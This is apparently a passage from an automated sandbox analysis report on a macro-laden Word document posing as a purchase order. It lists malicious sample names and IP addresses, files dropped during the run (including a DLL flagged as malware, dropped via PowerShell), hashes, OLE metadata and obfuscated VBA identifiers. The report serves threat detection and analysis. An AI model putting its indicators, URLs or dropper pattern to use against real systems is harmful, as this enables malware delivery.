                                                      • 69.38.130.14
                                                      INFO.docGet hashmaliciousBrowse
                                                      • 69.38.130.14
                                                      DOK-012021.docGet hashmaliciousBrowse
                                                      • 69.38.130.14
                                                      DKMNT.docGet hashmaliciousBrowse
                                                      • 69.38.130.14
                                                      WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                      • 69.38.130.14
                                                      file.docGet hashmaliciousBrowse
                                                      • 69.38.130.14
                                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                      • 69.38.130.14
                                                      ASN-CATCHCOMNOFP4554867134UQ.docGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      79a2gzs3gkk.docGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      INFO.docGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      DKMNT.docGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      file.docGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      mssecsvr.exeGet hashmaliciousBrowse
                                                      • 159.163.124.251
                                                      windows.staterepositoryupgrade.exeGet hashmaliciousBrowse
                                                      • 195.159.28.244
                                                      Check.vbsGet hashmaliciousBrowse
                                                      • 64.28.27.61
                                                      HKHX38WttZ.exeGet hashmaliciousBrowse
                                                      • 195.159.28.230
                                                      SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dllGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      Information-822908953.docGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      ef5ai1p.dllGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      Documentation.478396766.docGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      Information-478224510.docGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      7aKeSIV5Cu.dllGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      qRMGCk1u96.dllGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      dVcML4Zl0J.dllGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      JTWtIx6ADf.dllGet hashmaliciousBrowse
                                                      • 193.90.12.121
                                                      NETMAGIC-APNetmagicDatacenterMumbaiINDOK-012021.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      DKMNT.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      WWB4766-012021-4480624.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      file.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      Dokumentation_2021_M_428406.docGet hashmaliciousBrowse
                                                      • 103.143.46.51
                                                      DEX182020.exeGet hashmaliciousBrowse
                                                      • 103.120.177.86
                                                      79685175.docGet hashmaliciousBrowse
                                                      • 103.235.105.46
                                                      79685175.docGet hashmaliciousBrowse
                                                      • 103.235.105.46
                                                      PO#064612 291220.docGet hashmaliciousBrowse
                                                      • 103.235.105.46
                                                      9182483287326864.docGet hashmaliciousBrowse
                                                      • 103.205.64.138
                                                      City Report - December.docGet hashmaliciousBrowse
                                                      • 103.205.64.138
                                                      RFQ Order - Mediform S.A-pdf.exeGet hashmaliciousBrowse
                                                      • 101.53.153.202
                                                      https://faxting.sn.am/lZZ1Qol7sWqGet hashmaliciousBrowse
                                                      • 103.205.64.138
                                                      UqjZpY9ltr.docGet hashmaliciousBrowse
                                                      • 103.235.106.140
                                                      UqjZpY9ltr.docGet hashmaliciousBrowse
                                                      • 103.235.106.140
                                                      UqjZpY9ltr.docGet hashmaliciousBrowse
                                                      • 103.235.106.140
                                                      https://www.dropbox.com/s/5vgml9mqmjffp3n/Note%207V1N0UE.doc?dl=1Get hashmaliciousBrowse
                                                      • 103.235.106.140
                                                      https://www.dropbox.com/s/2gy2iqu12at1j6b/Documentation_PUIELLI5.doc?dl=1Get hashmaliciousBrowse
                                                      • 103.235.106.140
                                                      https://sricominfotech.com/wp-inlcudes/nevertoolate/fscalssical/hffhhfj.php?email=Billgates@microsoft.nlGet hashmaliciousBrowse
                                                      • 103.25.130.193
                                                      PSJ21840.exeGet hashmaliciousBrowse
                                                      • 103.48.50.49

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6B610EC-9B88-4A7A-BAAD-75353DCC52EC}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D276006A-4137-4F1B-A238-F5A3AEDA2F09}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1536
                                                      Entropy (8bit):1.3573187972516119
                                                      Encrypted:false
                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbr:IiiiiiiiiifdLloZQc8++lsJe1MzK/
                                                      MD5:077391DECA1A52BFEF17769EC216C04F
                                                      SHA1:37988417BC337B1835851A5C80AB570598288618
                                                      SHA-256:E8DB47CBB5176C6395AE34E4CF158381EBF0E5A337E870EB206BBB17E7D6FB8B
                                                      SHA-512:C259C29D43D106DE68EB448DCEEA85D254C80F1649719C7E82A293656CC61085E3779C604190A181C4B91C9A813EB438FBC89A0F602CB7C02CFD2E4FA4FD2787
                                                      Malicious:false
                                                      Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO# 01222021.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Jan 27 02:55:34 2021, length=172032, window=hide
                                                      Category:dropped
                                                      Size (bytes):2048
                                                      Entropy (8bit):4.490642152336677
                                                      Encrypted:false
                                                      SSDEEP:24:859/XTwz6Ikn4ndAeO0d1Dv3qFMqdM7dD259/XTwz6Ikn4ndAeO0d1Dv3qFMqdMj:83/XT3IkcAIE1Qh23/XT3IkcAIE1Q/
                                                      MD5:6EB10DB054A2FC20329E9A24A1F74C5A
                                                      SHA1:FCC1666D8F3F5F4C31E37E823BEDD6046FC0C3E6
                                                      SHA-256:33DA77C164AD6408A014B140971748E2E0AF6EDCBE16E3E84CA175041E8D1414
                                                      SHA-512:693C651FC2669ECF8DC4410E4FDE0E59C5F463F279F2C543BD74BA7156FC871F3C671A0138FD9C9D3B9CE15E5E64BAC9DBA8E12809106277F7425679EB4632B4
                                                      Malicious:false
                                                      Preview: L..................F.... ...P....{..P....{..a.C`................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....;R.. .PO#012~1.DOC..N.......Q.y.Q.y*...8.....................P.O.#. .0.1.2.2.2.0.2.1...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\618321\Users.user\Desktop\PO# 01222021.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.#. .0.1.2.2.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......618321..........D_....3N...W...9F.C...........[D_....3N...W
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):74
                                                      Entropy (8bit):4.005778791381565
                                                      Encrypted:false
                                                      SSDEEP:3:M1grHVEAltoHVEAlmX1grHVEAlv:MiL2A/M2A1L2A1
                                                      MD5:61D243ECFBDB337B6222DCEDA0836970
                                                      SHA1:A345D638AFD23701681AC8EAB13A1CFFBFE7A670
                                                      SHA-256:F4BD2CCCA06B35839418ABCFB364DF38BA94C3A3143F78653E01CBA58220397F
                                                      SHA-512:A663A81F7E18571CAC0F68FE3B3AF32059E8345D302F319B22F1CE75CB7EA299CC817510D4FA9369D3A8F273678E126066CA1316588A6A9E7962D51E3DCC8057
                                                      Malicious:false
                                                      Preview: [doc]..PO# 01222021.LNK=0..PO# 01222021.LNK=0..[doc]..PO# 01222021.LNK=0..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QEA56CXGKG1P2T41MR9D.temp
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.5817924455224888
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqPqvsqvJCwozz8hQCsMqPqvsEHyqvJCworVzkKYYHwf8RilUVhIu:cyuozz8ymHnorVzkRf8RHIu
                                                      MD5:C7E7B4D84BB21E802060729A72785E31
                                                      SHA1:471EBC4B37281BA67F179E127DA129B5AA0ED9ED
                                                      SHA-256:4503E94124DD30A6A2003C278AAD5081AE991C6BC17B1957B74C2778F37A5850
                                                      SHA-512:87FAB1D24905DF745AC78CEBA21679CA44D6F37E8B382E7AF9A6D4D1FF34DDBE1BA3E1B4CB9114EA68783240E369633F60FB2C90AE217FDED55A8B7F39203217
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\Desktop\~$# 01222021.doc
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                      C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):348504
                                                      Entropy (8bit):4.292507412588395
                                                      Encrypted:false
                                                      SSDEEP:3072:4vA1p08RqEQAIVEd2gG/vNlo0JFx/pANyCm0PQEKR/JnXHWP:4206xWgGxLxWN40PDKR/JnX2P
                                                      MD5:91C20850D113197A19A60B25AA08699D
                                                      SHA1:E4D444F34C5E5DF4FACBDD674A523386B3F6383B
                                                      SHA-256:A4AD0AEC4018E7C9A63324A417792D798E62C4686A2235615FC2B7339CA87F39
                                                      SHA-512:585A9A466F99F8F8F5974E6039BB0398D5725223AF3D2A0436B1CAFCF717CE8A3FE4A1B5FA02DA29FDE77F733C9C65D9789EF188578D352C7B955E53ECEDC338
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Metadefender, Detection: 49%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................<..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d....`.......0.............. ..@.text7..d....p.......2.............. ..@.text6..d............4.............. ..@.text5..d............6.............. ..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Steel Cambridgeshire productivity orchestration Handmade Soft Gloves program Regional Gorgeous quantify payment RSS, Author: Camila Tirado, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 16:11:00 2021, Last Saved Time/Date: Fri Jan 22 16:11:00 2021, Number of Pages: 1, Number of Words: 3367, Number of Characters: 19194, Security: 8
                                                      Entropy (8bit):6.713916312429104
                                                      TrID:
                                                      • Microsoft Word document (32009/1) 79.99%
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                      File name:PO# 01222021.doc
                                                      File size:171520
                                                      MD5:556b98b4cdae000de8f496d6d896743c
                                                      SHA1:b7ca4118eab252bc4758fa18265b04a2afbbf9c2
                                                      SHA256:dcfb145c4f46a072e988cdeafc065f8116dc3b27d6bed447024677f3ea2f252a
                                                      SHA512:8a5ef76599043a63d29bbfffb19b90154c803dfa1096250287d6adc618b6a2a30c33c72e8ce5c7c37e52f5a13392a934eedcf98a753eb19ec9ac17137cf1e9d2
                                                      SSDEEP:3072:jwT4OAEDCkss1NkYtWr7Agf5k9jySTdcrrXyQBsc0vWJVi4IrwVSYbdYPeFmfG5h:jwT4OAEDCkss1NkYtWr7Agf5k9jyTPI8
                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Static OLE Info

                                                      General

                                                      Document Type:OLE
                                                      Number of OLE Files:1

                                                      OLE File "PO# 01222021.doc"

                                                      Indicators

                                                      Has Summary Info:True
                                                      Application Name:Microsoft Office Word
                                                      Encrypted Document:False
                                                      Contains Word Document Stream:True
                                                      Contains Workbook/Book Stream:False
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:
                                                      Flash Objects Count:
                                                      Contains VBA Macros:True

                                                      Summary

                                                      Code Page:1252
                                                      Title:
                                                      Subject:Steel Cambridgeshire productivity orchestration Handmade Soft Gloves program Regional Gorgeous quantify payment RSS
                                                      Author:Camila Tirado
                                                      Keywords:
                                                      Comments:
                                                      Template:Normal.dotm
                                                      Last Saved By:
                                                      Revion Number:1
                                                      Total Edit Time:0
                                                      Create Time:2021-01-22 16:11:00
                                                      Last Saved Time:2021-01-22 16:11:00
                                                      Number of Pages:1
                                                      Number of Words:3367
                                                      Number of Characters:19194
                                                      Creating Application:Microsoft Office Word
                                                      Security:8

                                                      Document Summary

                                                      Document Code Page:-535
                                                      Number of Lines:159
                                                      Number of Paragraphs:45
                                                      Thumbnail Scaling Desired:False
                                                      Company:
                                                      Contains Dirty Links:False
                                                      Shared Document:False
                                                      Changed Hyperlinks:False
                                                      Application Version:917504

                                                      Streams with VBA

                                                      VBA File Name: Dulz0g2a3qqdjsty7, Stream Size: 25190
                                                      General
                                                      Stream Path:Macros/VBA/Dulz0g2a3qqdjsty7
                                                      VBA File Name:Dulz0g2a3qqdjsty7
                                                      Stream Size:25190
                                                      Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 fa 62 ff 18 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                      VBA Code Keywords

                                                      Keyword
                                                      aOIKG
                                                      FgPjRJEIR,
                                                      tLOwC
                                                      SeKqFAFNv
                                                      Until
                                                      OYlTFEt
                                                      msHCWHCAt
                                                      GnnqWGPGJ
                                                      gYFIC
                                                      NswmEPELA.Range
                                                      vrXECqWF.Range
                                                      EeuJHEHF
                                                      PyJkHIE,
                                                      aMiqITVGL
                                                      lcxHPB:
                                                      vajlM
                                                      okSXVy
                                                      AtZVIBkE
                                                      GcgMIFBS
                                                      QqMgHpfGB,
                                                      qucrJCEBy,
                                                      QntVIZAdD,
                                                      OCclfDa
                                                      qPVaAz
                                                      piVqgYJ(iPrzI)
                                                      (rqaveCGz
                                                      cxLJIGiD
                                                      USfrGE
                                                      beeZpf:
                                                      rqaveCGz,
                                                      pWDVU
                                                      BfQqFX,
                                                      (FfmNDT
                                                      FTLaqR
                                                      WDyUCG
                                                      KUSkBEC,
                                                      QGvuB
                                                      MidB$(vLWhdu,
                                                      TNoCFZI
                                                      hSmgtNpln
                                                      njcnja
                                                      (KUSkBEC
                                                      UBound(QGvuB)
                                                      wMDcH
                                                      msHCWHCAt(PJULJBb)
                                                      (OnZyDDGUB
                                                      immQJ:
                                                      rpBOJCg,
                                                      zxmKGAJHA.Range
                                                      PyJkHIE
                                                      eKFHKDJw
                                                      (USfrGE
                                                      piVqgYJ
                                                      lPbZa
                                                      FkmBAH:
                                                      QqMgHpfGB
                                                      mvXsJDCI
                                                      sXjiJI
                                                      CuSGXNGI
                                                      iXiRFIE
                                                      IcgiD
                                                      omukcDDAB
                                                      VSeBJC
                                                      MidB$(KWoNDrI,
                                                      UBound(ugTHSC)
                                                      IuiADKc
                                                      FrGcEy
                                                      NswmEPELA
                                                      kGKlCH(TWSLHrEJ)
                                                      PJULJBb,
                                                      WotFy
                                                      PJULJBb
                                                      euviCGGE
                                                      MidB$(QGvuB,
                                                      aXyHAY(rjilFB)
                                                      iPrzI,
                                                      qLAiGc(tLOwC)
                                                      fQyMHGCJ.Range
                                                      NIEFpmJ
                                                      UBound(qLAiGc)
                                                      UBound(sXjiJI)
                                                      BygJBD
                                                      FfmNDT
                                                      hXmVsAI
                                                      NDrVK:
                                                      tFqUPL
                                                      (TyLaL
                                                      tLOwC,
                                                      cfmpCCej
                                                      IZBck
                                                      SeegFDA
                                                      HaMJF,
                                                      kGKlCH()
                                                      rGxSBFAm
                                                      lroNB.Range
                                                      ezXAHG
                                                      lPbZa.Range
                                                      wjnsc
                                                      LxgTE(mvXsJDCI)
                                                      uwljH
                                                      UXwvP
                                                      FTLaqR,
                                                      YxuWVAC
                                                      rjilFB
                                                      ASxkJEBEJ,
                                                      nnjasd,
                                                      Resume
                                                      SeochBB:
                                                      MidB$(gPiUJUCJ,
                                                      (tLOwC
                                                      UApNCTSB()
                                                      cEEUvC,
                                                      tksEqFXE
                                                      dQimAHCD
                                                      (qucrJCEBy
                                                      avenCHqCM:
                                                      MidB$(euviCGGE,
                                                      HtbOAHKIF
                                                      KboWpC
                                                      MidB$(sXjiJI,
                                                      hSmgtNpln:
                                                      xeQqnwEGH.Range
                                                      cxLJIGiD(FrGcEy)
                                                      MidB$(piVqgYJ,
                                                      FfmNDT,
                                                      ZBLQItWK,
                                                      PAPyDG
                                                      qLAiGc()
                                                      HZrrCCPJ:
                                                      uvWvDCq
                                                      vLWhdu
                                                      uifQEJ
                                                      (lZIWVW
                                                      ugTHSC()
                                                      InWYD
                                                      GnnqWGPGJ,
                                                      WEjBx
                                                      WEjBx,
                                                      UBound(msHCWHCAt)
                                                      WygyQ
                                                      FlHJG
                                                      (QqMgHpfGB
                                                      SJaMAW
                                                      WystvJDiH
                                                      XFQcotHEl
                                                      HmdtGfbHA
                                                      WotFy,
                                                      (ZBLQItWK
                                                      (PyJkHIE
                                                      lkPbvChTB.Range
                                                      MidB$(cxLJIGiD,
                                                      beoayAGAs
                                                      cQXOHIGG
                                                      KWoNDrI
                                                      fHEAXGB
                                                      UeaVqCIF
                                                      MidB$(CuSGXNGI,
                                                      MidB$(UApNCTSB,
                                                      ORvhuHGGD
                                                      (FrGcEy
                                                      hrhpx
                                                      HoycEGGS
                                                      lcxHPB
                                                      MidB$(msHCWHCAt,
                                                      PlYykHypI
                                                      MidB$(okSXVy,
                                                      (WotFy
                                                      mbpdgB
                                                      bkRdqzBB
                                                      MidB$(ugTHSC,
                                                      TyLaL
                                                      rpBOJCg
                                                      (TWSLHrEJ
                                                      TZIFFtB.Range
                                                      ORvhuHGGD,
                                                      dKpjABOAD
                                                      EWwbyEvG.Range
                                                      EBcorGpdB
                                                      TWSLHrEJ
                                                      (iPrzI
                                                      jKqFehtZP
                                                      FgPjRJEIR
                                                      avenCHqCM
                                                      NlrKo,
                                                      VqFNFwx
                                                      UBound(YRistJGeF)
                                                      HaMJF
                                                      nBWRH
                                                      UBound(KWoNDrI)
                                                      bKFVL
                                                      YEfXME:
                                                      hfACeBO
                                                      WystvJDiH.Range
                                                      gPiUJUCJ()
                                                      HYflxGv
                                                      eKFHKDJw,
                                                      HsCTGA
                                                      zvYxeGGBh:
                                                      OYlTFEt:
                                                      hXmVsAI()
                                                      GcgMIFBS,
                                                      hXmVsAI(FTLaqR)
                                                      txnfIE
                                                      BkCHJMwO
                                                      MidB$(qLAiGc,
                                                      dNKFVFD:
                                                      zxmKGAJHA
                                                      VADSpA
                                                      YEXZi
                                                      KWoNDrI(GnnqWGPGJ)
                                                      UBound(CuSGXNGI)
                                                      UBound(LxgTE)
                                                      UvPjdXBJH
                                                      vLWhdu(NlrKo)
                                                      dPnKGaIH
                                                      YEfXME
                                                      NlrKo
                                                      Mid(Application.Name,
                                                      bKFVL.Range
                                                      euviCGGE()
                                                      qLAiGc
                                                      kfglYjE:
                                                      piVqgYJ()
                                                      rqaveCGz
                                                      eGrznOJJ
                                                      SeegFDA,
                                                      ZBLQItWK
                                                      eFdbX:
                                                      kVnSBBJ
                                                      cEEUvC
                                                      FkmBAH
                                                      CBOhDJ
                                                      sXjiJI(ASxkJEBEJ)
                                                      (XFQcotHEl
                                                      YeeasmCg
                                                      XFQcotHEl,
                                                      VADSpA.Range
                                                      RSCoIAgA
                                                      MiRGG
                                                      (QntVIZAdD
                                                      itfbnIkB
                                                      UBound(vLWhdu)
                                                      qpYICE
                                                      ipaAe
                                                      DEdCJACpO
                                                      nZrgFol
                                                      (FTLaqR
                                                      PTiWFW
                                                      sXjiJI()
                                                      JPAoPL
                                                      aXyHAY
                                                      ydHfQ
                                                      WolyDl
                                                      QntVIZAdD
                                                      bjyQsJ
                                                      (NlrKo
                                                      lZIWVW,
                                                      "sadsaccc"
                                                      "sasdsacc"
                                                      QGvuB()
                                                      GRIeHCUTC:
                                                      uwljH,
                                                      rjilFB,
                                                      msHCWHCAt()
                                                      UBound(cxLJIGiD)
                                                      iXiRFIE(BfQqFX)
                                                      IwzPAgE
                                                      YRistJGeF(MDLMBAHzC)
                                                      euviCGGE(PyJkHIE)
                                                      fgxZE
                                                      lMxaZeHEA
                                                      rdwmZFK,
                                                      gPiUJUCJ(mXwueE)
                                                      MidB$(ipaAe,
                                                      arYPBNC
                                                      vLWhdu()
                                                      VqFNFwx.Range
                                                      MidB$(hXmVsAI,
                                                      UBound(euviCGGE)
                                                      lIOoEHE
                                                      UCtihtI
                                                      tTUuY
                                                      (HaMJF
                                                      JQyfEHCFH:
                                                      GRIeHCUTC
                                                      (qpYICE
                                                      ASxkJEBEJ
                                                      VB_Name
                                                      Word.Paragraph
                                                      (rjilFB
                                                      UBound(piVqgYJ)
                                                      YRistJGeF()
                                                      (rpBOJCg
                                                      lkPbvChTB
                                                      (mbpdgB
                                                      vajlM:
                                                      MidB$(YRistJGeF,
                                                      JQyfEHCFH
                                                      rdwmZFK
                                                      MDLMBAHzC
                                                      Content
                                                      MIQyJC
                                                      SysLpJnC
                                                      eFdbX
                                                      MidB$(aXyHAY,
                                                      LxgTE
                                                      PwKrSn
                                                      KWoNDrI()
                                                      NRXsPIGD
                                                      mXwueE,
                                                      (uwljH
                                                      (ASxkJEBEJ
                                                      UQnFD
                                                      (cEEUvC
                                                      RrOlGJCr
                                                      hfACeBO:
                                                      (PJULJBb
                                                      mXwueE
                                                      gPiUJUCJ
                                                      MidB$(iXiRFIE,
                                                      ipaAe()
                                                      UBound(gPiUJUCJ)
                                                      FWzgiHG
                                                      (MDLMBAHzC
                                                      iPrzI
                                                      dNKFVFD
                                                      kGKlCH
                                                      (mvXsJDCI
                                                      CuSGXNGI()
                                                      bJfJIBEBC
                                                      aXyHAY()
                                                      HoycEGGS.Range
                                                      IZBck,
                                                      TZIFFtB
                                                      IPiQsIN
                                                      KUSkBEC
                                                      beeZpf
                                                      WmhUJ
                                                      UBound(kGKlCH)
                                                      TPpjQ:
                                                      UApNCTSB(TyLaL)
                                                      YRistJGeF
                                                      UBound(UApNCTSB)
                                                      UBound(ipaAe)
                                                      okSXVy(rdwmZFK)
                                                      MDLMBAHzC,
                                                      BfQqFX
                                                      VJBiOEoB
                                                      rGxSBFAm.Range
                                                      okSXVy()
                                                      (rdwmZFK
                                                      BvwhhQNB
                                                      (IZBck
                                                      oVIlzvB
                                                      UQnFD.Range
                                                      FoVpJCArD
                                                      iXiRFIE()
                                                      OnZyDDGUB,
                                                      OJlopx
                                                      yroaOGI
                                                      jKqFehtZP.Range
                                                      NDrVK
                                                      TPpjQ
                                                      USfrGE,
                                                      Len(skuwd))
                                                      qpYICE,
                                                      MeewHjDR
                                                      MidB$(kGKlCH,
                                                      CBOhDJ.Range
                                                      (WEjBx
                                                      XcIBFVflC
                                                      OnZyDDGUB
                                                      RrOlGJCr:
                                                      uJJmytp
                                                      MIQyJC.Range
                                                      EOBHCBBF
                                                      TyLaL,
                                                      ukURCshB
                                                      mbpdgB,
                                                      (ORvhuHGGD
                                                      aetYHHHFP
                                                      EWwbyEvG
                                                      CuSGXNGI(KUSkBEC)
